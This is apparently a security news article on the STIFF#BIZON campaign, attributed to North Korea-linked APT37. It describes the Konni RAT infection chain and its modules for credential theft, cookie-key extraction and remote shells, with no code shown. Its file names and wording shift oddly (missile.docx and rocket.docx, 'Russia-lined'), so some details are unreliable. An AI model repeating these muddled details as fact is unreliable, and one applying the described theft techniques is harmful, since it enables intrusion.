The North Korea-affiliated APT37 group targets high-quality organizations in the Czech Republic, Poland and other countries.
Researchers from the Securonix Threat Research (STR) team have uncovered a new attack campaign, tracked as STIFF#BIZON, targeting high-value organizations in several countries including the Czech Republic and Poland. Researchers attribute this campaign to the North Korea-linked APT37 group, also known as Ricochet Chollima.
The attackers deployed the Konni RAT (Remote Access Trojan), which was first discovered by Cisco Talos researchers in 2017 and has remained undetected since 2014 while being used in highly targeted attacks. The RAT has escaped detection due to continuous development, it is capable of executing arbitrary code on the target systems and stealing data.
The Konni RAT has been attributed to North Korea-linked threat actors tracked as Thallium and APT37.
The chain of attacks begins with phishing messages that attempt to trick victims into opening a malicious attachment.
The attachment used in this campaign is an archive containing a Word document (missile.docx) and a Windows shortcut file (_weapons.doc.lnk.lnk).
After opening the LNK file, the chain of infection begins.
“Code execution starts with embedding small snippets of code in the shortcut file, which runs along with the intended binary and executes when the user double-clicks it,” reads the analysis published by the experts. “This code runs and executes base64 encoded text appended to the end of the rocket.docx file.”
The Base64 payload runs along with a PowerShell script that contacts the C2 to download and run the weapons.doc and wp.vbs files.
The arms.doc is a decoy document, while the wp.vbs silently runs in the background and creates a scheduled task called “Office Update” on the host that runs a Base64-encoded PowerShell script.
At this point, C2 communication is re-established, allowing the attackers to access the system.
Once the Konni RAT has been loaded onto the infected system, threat actors can use specific modules to perform the following functions:
- Capture.net.exe – Capture screenshots using the Win32 GDI API and upload the zipped results to the C2 server.
- chkey.net.exe – Extract state keys stored in local state file encrypted with DPAPI. A state key allows attackers to crack the cookie database decryption, which is useful in MFA bypass.
- pull.net.exe – Extract saved credentials from victim’s web browsers.
- shell.net.exe – Set up a remote interactive shell that can run commands every 10 seconds.
To further maintain persistence, attackers use a modified version of the Konni malware. You can download a .cab file containing several files related to the malware (bat, dll, dat, ini, dll).
The experts are also discussing the possibility of false flag operations where the Russia-lined APT28 group could masquerade as APT37.
“Also, there appears to be a direct correlation between IP addresses, hosting providers, and hostnames between this attack and historical data that we saw previously from FancyBear/APT28. In the end, what makes this particular case interesting is the use of Konni malware in conjunction with trade similarities to APT28.” concludes the report.
Follow me on Twitter: @Security questions and Facebook
(security matters – Hack, APT37)